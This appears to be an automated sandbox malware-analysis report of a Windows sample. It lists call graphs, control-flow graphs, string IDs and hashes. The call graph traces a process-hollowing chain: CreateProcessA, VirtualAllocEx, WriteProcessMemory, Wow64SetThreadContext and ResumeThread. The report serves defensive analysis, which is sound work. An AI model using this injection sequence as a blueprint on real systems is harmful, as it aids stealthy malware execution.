39938->39940 39939 6f8549d 39939->39863 39940->39863 39940->39939 39941 6f808e8 Wow64SetThreadContext 39940->39941 39942 6f808e1 Wow64SetThreadContext 39940->39942 39943 6f861b8 2 API calls 39940->39943 39944 6f861a8 2 API calls 39940->39944 39941->39940 39942->39940 39943->39940 39944->39940 39947 6f8548b 39945->39947 39946 6f8549d 39946->39863 39947->39863 39947->39946 39948 6f808e8 Wow64SetThreadContext 39947->39948 39949 6f808e1 Wow64SetThreadContext 39947->39949 39950 6f861b8 2 API calls 39947->39950 39951 6f861a8 2 API calls 39947->39951 39948->39947 39949->39947 39950->39947 39951->39947 39954 6f8548b 39952->39954 39953 6f8549d 39953->39863 39954->39863 39954->39953 39955 6f808e8 Wow64SetThreadContext 39954->39955 39956 6f808e1 Wow64SetThreadContext 39954->39956 39957 6f861b8 2 API calls 39954->39957 39958 6f861a8 2 API calls 39954->39958 39955->39954 39956->39954 39957->39954 39958->39954 39960 6f8591b 39959->39960 40087 6f812e8 39960->40087 40091 6f812f0 39960->40091 39961 6f85cfe 40095 6f813d9 39964->40095 40099 6f813e0 39964->40099 39965 6f8556e 39965->39863 39969 6f8548b 39968->39969 39969->39863 39970 6f8549d 39969->39970 39971 6f808e8 Wow64SetThreadContext 39969->39971 39972 6f808e1 Wow64SetThreadContext 39969->39972 39973 6f861b8 2 API calls 39969->39973 39974 6f861a8 2 API calls 39969->39974 39970->39863 39971->39969 39972->39969 39973->39969 39974->39969 39976 6f8599a 39975->39976 39979 6f812e8 WriteProcessMemory 39975->39979 39980 6f812f0 WriteProcessMemory 39975->39980 39977 6f812e8 WriteProcessMemory 39976->39977 39978 6f812f0 WriteProcessMemory 39976->39978 39977->39976 39978->39976 39979->39976 39980->39976 39982 6f853fb 39981->39982 39985 6f81578 CreateProcessA 39982->39985 39986 6f8156d CreateProcessA 39982->39986 39983 6f8549d 39983->39863 39984 6f8542f 39984->39863 39984->39983 39987 6f808e8 Wow64SetThreadContext 39984->39987 39988 6f808e1 Wow64SetThreadContext 39984->39988 39989 6f861b8 2 API calls 39984->39989 39990 6f861a8 2 API calls 39984->39990 39985->39984 39986->39984 39987->39984 39988->39984 39989->39984 39990->39984 39992 6f8590e 39991->39992 39994 6f812e8 WriteProcessMemory 39992->39994 39995 6f812f0 WriteProcessMemory 39992->39995 39993 6f85cfe 39994->39993 39995->39993 39999 6f812e8 WriteProcessMemory 39996->39999 40000 6f812f0 WriteProcessMemory 39996->40000 39997 6f8548b 39997->39863 39998 6f8549d 39997->39998 40001 6f808e8 Wow64SetThreadContext 39997->40001 40002 6f808e1 Wow64SetThreadContext 39997->40002 40003 6f861b8 2 API calls 39997->40003 40004 6f861a8 2 API calls 39997->40004 39998->39863 39999->39997 40000->39997 40001->39997 40002->39997 40003->39997 40004->39997 40006 6f8548b 40005->40006 40006->39863 40007 6f8549d 40006->40007 40008 6f808e8 Wow64SetThreadContext 40006->40008 40009 6f808e1 Wow64SetThreadContext 40006->40009 40010 6f861b8 2 API calls 40006->40010 40011 6f861a8 2 API calls 40006->40011 40007->39863 40008->40006 40009->40006 40010->40006 40011->40006 40014 6f808e8 Wow64SetThreadContext 40012->40014 40015 6f808e1 Wow64SetThreadContext 40012->40015 40013 6f8578b 40013->39863 40014->40013 40015->40013 40018 6f853a7 40016->40018 40017 6f85f46 40018->40017 40020 6f8542f 40018->40020 40021 6f81578 CreateProcessA 40018->40021 40022 6f8156d CreateProcessA 40018->40022 40019 6f8549d 40019->39863 40020->39863 40020->40019 40023 6f808e8 Wow64SetThreadContext 40020->40023 40024 6f808e1 Wow64SetThreadContext 40020->40024 40025 6f861b8 2 API calls 40020->40025 40026 6f861a8 2 API calls 40020->40026 40021->40020 40022->40020 40023->40020 40024->40020 40025->40020 40026->40020 40028 6f8548b 40027->40028 40028->39863 40028->40027 40029 6f8549d 40028->40029 40030 6f861b8 2 API calls 40028->40030 40031 6f861a8 2 API calls 40028->40031 40032 6f808e8 Wow64SetThreadContext 40028->40032 40033 6f808e1 Wow64SetThreadContext 40028->40033 40029->39863 40030->40028 40031->40028 40032->40028 40033->40028 40036 6f8548b 40034->40036 40035 6f8549d 40035->39863 40036->39863 40036->40035 40037 6f808e8 Wow64SetThreadContext 40036->40037 40038 6f808e1 Wow64SetThreadContext 40036->40038 40039 6f861b8 2 API calls 40036->40039 40040 6f861a8 2 API calls 40036->40040 40037->40036 40038->40036 40039->40036 40040->40036 40042 6f8599a 40041->40042 40042->40041 40043 6f812e8 WriteProcessMemory 40042->40043 40044 6f812f0 WriteProcessMemory 40042->40044 40043->40042 40044->40042 40046 6f80e38 VirtualAllocEx 40045->40046 40048 6f80e75 40046->40048 40048->39925 40050 6f80e38 VirtualAllocEx 40049->40050 40052 6f80e75 40050->40052 40052->39925 40054 6f81601 CreateProcessA 40053->40054 40056 6f817c3 40054->40056 40058 6f81601 CreateProcessA 40057->40058 40060 6f817c3 40058->40060 40062 6f861cd 40061->40062 40079 6f80838 40062->40079 40083 6f80831 40062->40083 40063 6f861e0 40063->39930 40067 6f861cd 40066->40067 40069 6f80838 ResumeThread 40067->40069 40070 6f80831 ResumeThread 40067->40070 40068 6f861e0 40068->39930 40069->40068 40070->40068 40072 6f8092d Wow64SetThreadContext 40071->40072 40074 6f80975 40072->40074 40074->39930 40076 6f8092d Wow64SetThreadContext 40075->40076 40078 6f80975 40076->40078 40078->39930 40080 6f80878 ResumeThread 40079->40080 40082 6f808a9 40080->40082 40082->40063 40084 6f80878 ResumeThread 40083->40084 40086 6f808a9 40084->40086 40086->40063 40088 6f81338 WriteProcessMemory 40087->40088 40090 6f8138f 40088->40090 40090->39961 40092 6f81338 WriteProcessMemory 40091->40092 40094 6f8138f 40092->40094 40094->39961 40096 6f813e0 ReadProcessMemory 40095->40096 40098 6f8146f 40096->40098 40098->39965 40100 6f8142b ReadProcessMemory 40099->40100 40102 6f8146f 40100->40102 40102->39965 40104 6f823b5 40103->40104 40106 6f82406 40103->40106 40114 6f823d8 40104->40114 40118 6f823d5 40104->40118 40105 6f823bc 40105->39916 40106->39916 40110 6f823a5 40109->40110 40111 6f823bc 40110->40111 40112 6f823d8 3 API calls 40110->40112 40113 6f823d5 3 API calls 40110->40113 40111->39916 40112->40111 40113->40111 40116 6f82448 2 API calls 40114->40116 40117 6f82438 2 API calls 40114->40117 40115 6f823f2 40115->40105 40116->40115 40117->40115 40119 6f823f2 40118->40119 40120 6f82448 2 API calls 40118->40120 40121 6f82438 2 API calls 40118->40121 40119->40105 40120->40119 40121->40119 40221 6f81ba4 40223 6f81aea 40221->40223 40225 6f81991 40221->40225 40222 6f819b6 40223->40222 40226 6f84fc8 12 API calls 40223->40226 40227 6f84fb8 12 API calls 40223->40227 40228 6f85018 12 API calls 40223->40228 40224 6f819dd 40224->40222 40229 6f82318 3 API calls 40224->40229 40230 6f82308 3 API calls 40224->40230 40225->40222 40225->40223 40225->40224 40226->40222 40227->40222 40228->40222 40229->40222 40230->40222

                                                                                                                      Executed Functions

                                                                                                                      Function 0667773C Relevance: 6.9, Strings: 5, Instructions: 621COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 341 667773c-66781d0 344 66781d6-66781db 341->344 345 66786b3-667871c 341->345 344->345 346 66781e1-66781fe 344->346 353 6678723-66787ab 345->353 352 6678204-6678208 346->352 346->353 354 6678217-667821b 352->354 355 667820a-6678214 call 667774c 352->355 397 66787b6-6678836 353->397 359 667821d-6678227 call 667774c 354->359 360 667822a-6678231 354->360 355->354 359->360 362 6678237-6678267 360->362 363 667834c-6678351 360->363 374 6678a36-6678a5c 362->374 375 667826d-6678340 call 6677758 * 2 362->375 366 6678353-6678357 363->366 367 6678359-667835e 363->367 366->367 370 6678360-6678364 366->370 371 6678370-66783a0 call 6677764 * 3 367->371 370->374 376 667836a-667836d 370->376 371->397 398 66783a6-66783a9 371->398 391 6678a5e-6678a6a 374->391 392 6678a6c 374->392 375->363 406 6678342 375->406 376->371 396 6678a6f-6678a74 391->396 392->396 414 667883d-66788bf 397->414 398->397 401 66783af-66783b1 398->401 401->397 404 66783b7-66783ec 401->404 413 66783f2-66783fb 404->413 404->414 406->363 415 6678401-667845b call 6677764 * 2 call 6677774 * 2 413->415 416 667855e-6678562 413->416 419 66788c7-6678949 414->419 460 667846d 415->460 461 667845d-6678466 415->461 416->419 420 6678568-667856c 416->420 425 6678951-667897e 419->425 424 6678572-6678578 420->424 420->425 428 667857c-66785b1 424->428 429 667857a 424->429 439 6678985-6678a05 425->439 434 66785b8-66785be 428->434 429->434 434->439 440 66785c4-66785cc 434->440 496 6678a0c-6678a2e 439->496 444 66785d3-66785d5 440->444 445 66785ce-66785d2 440->445 450 6678637-667863d 444->450 451 66785d7-66785fb 444->451 445->444 453 667863f-667865a 450->453 454 667865c-667868a 450->454 480 6678604-6678608 451->480 481 66785fd-6678602 451->481 472 6678692-667869e 453->472 454->472 466 6678471-6678473 460->466 461->466 469 6678468-667846b 461->469 475 6678475 466->475 476 667847a-667847e 466->476 469->466 495 66786a4-66786b0 472->495 472->496 475->476 478 6678480-6678487 476->478 479 667848c-6678492 476->479 483 6678529-667852d 478->483 486 6678494-667849a 479->486 487 667849c-66784a1 479->487 480->374 490 667860e-6678611 480->490 484 6678614-6678625 481->484 492 667852f-6678549 483->492 493 667854c-6678558 483->493 531 6678627 call 6678ac1 484->531 532 6678627 call 6678ad0 484->532 494 66784a7-66784ad 486->494 487->494 490->484 492->493 493->415 493->416 502 66784b3-66784b8 494->502 503 66784af-66784b1 494->503 496->374 498 667862d-6678635 498->472 507 66784ba-66784cc 502->507 503->507 508 66784d6-66784db 507->508 509 66784ce-66784d4 507->509 514 66784e1-66784e8 508->514 509->514 518 66784ee 514->518 519 66784ea-66784ec 514->519 522 66784f3-66784fe 518->522 519->522 523 6678522 522->523 524 6678500-6678503 522->524 523->483 524->483 526 6678505-667850b 524->526 527 6678512-667851b 526->527 528 667850d-6678510 526->528 527->483 530 667851d-6678520 527->530 528->523 528->527 530->483 530->523 531->498 532->498
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Hhq$Hhq$Hhq$Hhq$Hhq
                                                                                                                      • API String ID: 0-1427472961
                                                                                                                      • Opcode ID: 00bdc606a597cd46484673855105ac2feb7415d1c08415d5d71ccbe77cfbbb34
                                                                                                                      • Instruction ID: c22f88fc9fffd73c11e1f72a6b5efbc6c3caf7c871f9d1c38b3032c42006dab7
                                                                                                                      • Opcode Fuzzy Hash: 00bdc606a597cd46484673855105ac2feb7415d1c08415d5d71ccbe77cfbbb34
                                                                                                                      • Instruction Fuzzy Hash: A0324070E002548FDB94DFA9C85479EBBF2AF88300F1485ADD50AAB399DB349D45CF91
                                                                                                                      Function 0667819A Relevance: .3, Instructions: 278COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 828aa8f7a817c65a4255979b224074b3570d91ce93b198a5842b279a63e4bc8c
                                                                                                                      • Instruction ID: f238fb4e5e3a1f1b4f377cf55b9be1e4391a2b55873eae1b3a69c622c6b37458
                                                                                                                      • Opcode Fuzzy Hash: 828aa8f7a817c65a4255979b224074b3570d91ce93b198a5842b279a63e4bc8c
                                                                                                                      • Instruction Fuzzy Hash: 5FC14B30E002589FDF94CFA9C984799BBB2EF88310F14C1A9D459AB255EB74AD85CF90
                                                                                                                      Function 06B84B70 Relevance: 16.3, Strings: 13, Instructions: 93COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 294 6b84b70-6b84b8b 296 6b84c0e-6b84c15 294->296 297 6b84c20-6b84c58 296->297 301 6b84c5f-6b84c61 297->301 302 6b84b90-6b84b93 301->302 303 6b84b9c-6b84bb0 302->303 304 6b84b95 302->304 307 6b84cad-6b84cbf 303->307 308 6b84bb6-6b84bca 303->308 304->296 304->301 304->303 305 6b84c66-6b84c81 304->305 315 6b84c99-6b84cac 305->315 316 6b84c83-6b84c89 305->316 308->307 310 6b84bd0-6b84bde 308->310 310->307 312 6b84be4-6b84bf7 310->312 312->307 314 6b84bfd-6b84c0c 312->314 314->302 317 6b84c8b 316->317 318 6b84c8d-6b84c8f 316->318 317->315 318->315
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$8hq$8hq$LRdq$LRdq$LRdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                      • API String ID: 0-1080938503
                                                                                                                      • Opcode ID: 15ccb1863eb19e7d6b660baae0db5fa9e19ca8a26b2b0aadf260abff3d3b49cb
                                                                                                                      • Instruction ID: 200eb42402a5eb9324fc1dfe4d7932b5af248597644e3617d4d089ab6afc3cd1
                                                                                                                      • Opcode Fuzzy Hash: 15ccb1863eb19e7d6b660baae0db5fa9e19ca8a26b2b0aadf260abff3d3b49cb
                                                                                                                      • Instruction Fuzzy Hash: C631F4B0B102059FD394EB69D80476A7BF6EB85305F1480FAD115CB392EB35CC49CBA1
                                                                                                                      Function 0239DB58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 320 239db58-239dbe7 GetCurrentProcess 324 239dbe9-239dbef 320->324 325 239dbf0-239dc24 GetCurrentThread 320->325 324->325 326 239dc2d-239dc61 GetCurrentProcess 325->326 327 239dc26-239dc2c 325->327 329 239dc6a-239dc82 326->329 330 239dc63-239dc69 326->330 327->326 333 239dc8b-239dcba GetCurrentThreadId 329->333 330->329 334 239dcbc-239dcc2 333->334 335 239dcc3-239dd25 333->335 334->335
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0239DBD6
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0239DC13
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0239DC50
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0239DCA9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID: `g
                                                                                                                      • API String ID: 2063062207-2645773341
                                                                                                                      • Opcode ID: 4111e9bd3a52045749982da4850a941e6cb0a9c5b4a82947831536b649ab5d17
                                                                                                                      • Instruction ID: afea01a601962a4c6fce9d67bb4a81a90749a55d0209cdee57f57d538cf3388d
                                                                                                                      • Opcode Fuzzy Hash: 4111e9bd3a52045749982da4850a941e6cb0a9c5b4a82947831536b649ab5d17
                                                                                                                      • Instruction Fuzzy Hash: A25178B09003498FDB54EFA9D548B9EBBF1EF88314F20845DE409A7360DB74A944CF65
                                                                                                                      Function 06F82448 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 640 6f82448-6f824ca 644 6f82709-6f8273c 640->644 645 6f824d0-6f824f5 640->645 651 6f82743-6f82778 644->651 650 6f824fb-6f82520 645->650 645->651 658 6f8277f-6f827b4 650->658 659 6f82526-6f82536 650->659 651->658 663 6f827bb-6f827e7 658->663 659->663 664 6f8253c-6f82540 659->664 669 6f827ee-6f8282c 663->669 666 6f8254e-6f82553 664->666 667 6f82542-6f82548 664->667 670 6f82561-6f82567 666->670 671 6f82555-6f8255b 666->671 667->666 667->669 673 6f82833-6f82871 669->673 675 6f82569-6f82570 670->675 676 6f82577-6f8258a 670->676 671->670 671->673 709 6f82878-6f82906 673->709 675->676 687 6f8258c-6f8258e 676->687 688 6f82590 676->688 691 6f82595-6f825ad 687->691 688->691 693 6f825af-6f825b5 691->693 694 6f825b7-6f825bb 691->694 693->694 696 6f8260a-6f82617 693->696 697 6f825bd-6f825e9 GetActiveWindow 694->697 698 6f825fe-6f82607 694->698 706 6f82619-6f8262f 696->706 707 6f82655-6f826a9 call 6f82b8f call 6f801b8 call 6f83ee1 696->707 700 6f825eb-6f825f1 697->700 701 6f825f2-6f825fc 697->701 698->696 700->701 701->696 717 6f8264d-6f82652 706->717 718 6f82631-6f82647 706->718 728 6f826af-6f826b7 707->728 734 6f82908 709->734 735 6f8290d 709->735 717->707 718->709 718->717 728->644 734->735 736 6f82915-6f82919 735->736
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ActiveWindow
                                                                                                                      • String ID: Hhq$Hhq
                                                                                                                      • API String ID: 2558294473-2450388649
                                                                                                                      • Opcode ID: c93c1c63b408eb2e72970594340a22e49ef66bb5e95560fcd07ed2734461091a
                                                                                                                      • Instruction ID: 39e49518aec25ddc0035cbdee49418a421cee9ceb1ac8037dc99a4e3cfcd9085
                                                                                                                      • Opcode Fuzzy Hash: c93c1c63b408eb2e72970594340a22e49ef66bb5e95560fcd07ed2734461091a
                                                                                                                      • Instruction Fuzzy Hash: 7EB1AE74F003549FCB48EFB8946476E7AA2EFC8340F548469D606AB394DF389D42CBA1
                                                                                                                      Function 06B83BF9 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 739 6b83bf9-6b83bff 740 6b83b8a-6b83b8d 739->740 741 6b83b8f 740->741 742 6b83b96-6b83ba8 740->742 741->742 743 6b83c08-6b83c1b 741->743 744 6b83cf9-6b83cfd 741->744 745 6b83baa-6b83bcf 741->745 746 6b83cb0-6b83cc2 741->746 747 6b83ce1-6b83ce7 741->747 748 6b83c01-6b83c06 741->748 749 6b83c73-6b83c9f 741->749 750 6b83ca4-6b83cab 741->750 742->740 759 6b83c23-6b83c25 743->759 755 6b83d1e 744->755 756 6b83cff-6b83d08 744->756 773 6b83bd1 745->773 774 6b83bd4-6b83bde 745->774 746->740 752 6b83ce9 747->752 753 6b83ceb 747->753 748->740 749->740 750->740 760 6b83ced-6b83cf6 752->760 753->760 757 6b83d21-6b83d28 755->757 762 6b83d0a-6b83d0d 756->762 763 6b83d0f-6b83d12 756->763 765 6b83c33-6b83c5c 759->765 766 6b83c27-6b83c2d 759->766 760->744 767 6b83d1c 762->767 763->767 775 6b83d29-6b83d3b 765->775 776 6b83c62-6b83c6e 765->776 768 6b83c2f 766->768 769 6b83c31 766->769 767->757 768->765 769->765 773->774 777 6b83be0-6b83be5 774->777 778 6b83be7-6b83bea 774->778 776->740 779 6b83bed-6b83bff 777->779 778->779 779->740
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LRdq$$dq$$dq$$dq
                                                                                                                      • API String ID: 0-3738214926
                                                                                                                      • Opcode ID: 6add128fc3969c76f68954172fb0249779b6cbcb306481bd7a8312fe7b62fa0b
                                                                                                                      • Instruction ID: 65c56642a784d7dfb83482b172d3bde0f7098383cc4e8cc7855af71bf784ed66
                                                                                                                      • Opcode Fuzzy Hash: 6add128fc3969c76f68954172fb0249779b6cbcb306481bd7a8312fe7b62fa0b
                                                                                                                      • Instruction Fuzzy Hash: A941D1F0B44219DFEB90AFA8D85477EB7F1FB44B10F1081AAE902AB2C1C6748941CB91
                                                                                                                      Function 06B83CD3 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 830 6b83cd3-6b83cdf 831 6b83cc2 830->831 832 6b83b8a-6b83b8d 831->832 833 6b83b8f 832->833 834 6b83b96-6b83ba8 832->834 833->834 835 6b83c08-6b83c1b 833->835 836 6b83cf9-6b83cfd 833->836 837 6b83baa-6b83bcf 833->837 838 6b83cb0-6b83cbd 833->838 839 6b83ce1-6b83ce7 833->839 840 6b83c01-6b83c06 833->840 841 6b83c73-6b83c9f 833->841 842 6b83ca4-6b83cab 833->842 834->832 850 6b83c23-6b83c25 835->850 847 6b83d1e 836->847 848 6b83cff-6b83d08 836->848 864 6b83bd1 837->864 865 6b83bd4-6b83bde 837->865 838->831 844 6b83ce9 839->844 845 6b83ceb 839->845 840->832 841->832 842->832 851 6b83ced-6b83cf6 844->851 845->851 849 6b83d21-6b83d28 847->849 853 6b83d0a-6b83d0d 848->853 854 6b83d0f-6b83d12 848->854 856 6b83c33-6b83c5c 850->856 857 6b83c27-6b83c2d 850->857 851->836 858 6b83d1c 853->858 854->858 866 6b83d29-6b83d3b 856->866 867 6b83c62-6b83c6e 856->867 859 6b83c2f 857->859 860 6b83c31 857->860 858->849 859->856 860->856 864->865 868 6b83be0-6b83be5 865->868 869 6b83be7-6b83bea 865->869 867->832 870 6b83bed-6b83bff 868->870 869->870 870->832
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LRdq$$dq$$dq
                                                                                                                      • API String ID: 0-1571560672
                                                                                                                      • Opcode ID: e3f02698342f6225b7eb8aebc48a26a14a4b12aab98d2b56229e0dbb4173ac96
                                                                                                                      • Instruction ID: 1fd7a8cbe872da7fbdaeaf74fb84a4bbd21683c182b08f75a001ab7aeddf0bb6
                                                                                                                      • Opcode Fuzzy Hash: e3f02698342f6225b7eb8aebc48a26a14a4b12aab98d2b56229e0dbb4173ac96
                                                                                                                      • Instruction Fuzzy Hash: 3431F2F0B44609DFEB906BD8D805B7E73F1EB04B11F1081BAE902AB2D1D6748941CB91
                                                                                                                      Function 06F83870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 895 6f83870-6f83913 GetCurrentThreadId 899 6f8391c-6f8394b call 6f82d64 895->899 900 6f83915-6f8391b 895->900 904 6f83950-6f8395d 899->904 900->899
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 06F83902
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 2882836952-2660418068
                                                                                                                      • Opcode ID: 4ef08f9624718bde2330ae80efbe3c9fca08118498b1611069bdfef424dbe0bc
                                                                                                                      • Instruction ID: 24ecc56e48adfdf1c0153631d344ffe3b5e5dafd43e487ac94b297a0dcfd2df2
                                                                                                                      • Opcode Fuzzy Hash: 4ef08f9624718bde2330ae80efbe3c9fca08118498b1611069bdfef424dbe0bc
                                                                                                                      • Instruction Fuzzy Hash: 503136B59042898FCB41EF99C844A9EFFF1FF48310F14859AD459A7326C774A944CFA1
                                                                                                                      Function 06F83880 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 905 6f83880-6f83913 GetCurrentThreadId 909 6f8391c-6f8394b call 6f82d64 905->909 910 6f83915-6f8391b 905->910 914 6f83950-6f8395d 909->914 910->909
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 06F83902
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 2882836952-2660418068
                                                                                                                      • Opcode ID: 4bf255a067fc5a885c09ee0d5b8d0a40183dd3b5ba25e87ed781bdbcdba9ac22
                                                                                                                      • Instruction ID: 0e00d37e9bd9767b0fbd4557f0f0158f4c40c213a79d0ff7c2021829835983b7
                                                                                                                      • Opcode Fuzzy Hash: 4bf255a067fc5a885c09ee0d5b8d0a40183dd3b5ba25e87ed781bdbcdba9ac22
                                                                                                                      • Instruction Fuzzy Hash: 422124B19002498FCB50EF99D884A9EFFF1FF48314F10859AD419AB325C774A945CFA1
                                                                                                                      Function 06B84B4C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 968 6b84b4c-6b84b6a 969 6b84b6c-6b84b6e 968->969 970 6b84b74-6b84b8b 968->970 969->970 971 6b84b70-6b84b73 969->971 972 6b84c0e-6b84c15 970->972 971->970 973 6b84c20-6b84c58 972->973 977 6b84c5f-6b84c61 973->977 978 6b84b90-6b84b93 977->978 979 6b84b9c-6b84bb0 978->979 980 6b84b95 978->980 983 6b84cad-6b84cbf 979->983 984 6b84bb6-6b84bca 979->984 980->972 980->977 980->979 981 6b84c66-6b84c81 980->981 991 6b84c99-6b84cac 981->991 992 6b84c83-6b84c89 981->992 984->983 986 6b84bd0-6b84bde 984->986 986->983 988 6b84be4-6b84bf7 986->988 988->983 990 6b84bfd-6b84c0c 988->990 990->978 993 6b84c8b 992->993 994 6b84c8d-6b84c8f 992->994 993->991 994->991
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8hq$8hq
                                                                                                                      • API String ID: 0-601589740
                                                                                                                      • Opcode ID: 4bb52eb435b1736612366a038c9e1a508b0c00e250787c936e65094641319dbd
                                                                                                                      • Instruction ID: 950a5f38281f55606fd881d185d00c814ba5611197c379f670184fd152d116cd
                                                                                                                      • Opcode Fuzzy Hash: 4bb52eb435b1736612366a038c9e1a508b0c00e250787c936e65094641319dbd
                                                                                                                      • Instruction Fuzzy Hash: B931E3B1A04205DFD784EB69D804B697BF6EB85305F2480FAD105CB392E775C809CBA1
                                                                                                                      Function 06B83284 Relevance: 2.5, Strings: 2, Instructions: 11COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $dq$$dq
                                                                                                                      • API String ID: 0-2340669324
                                                                                                                      • Opcode ID: 7b6fa6ea1a7e2e8d76887bcfbd7911f47c108eaf6bce733afc858521f6e32927
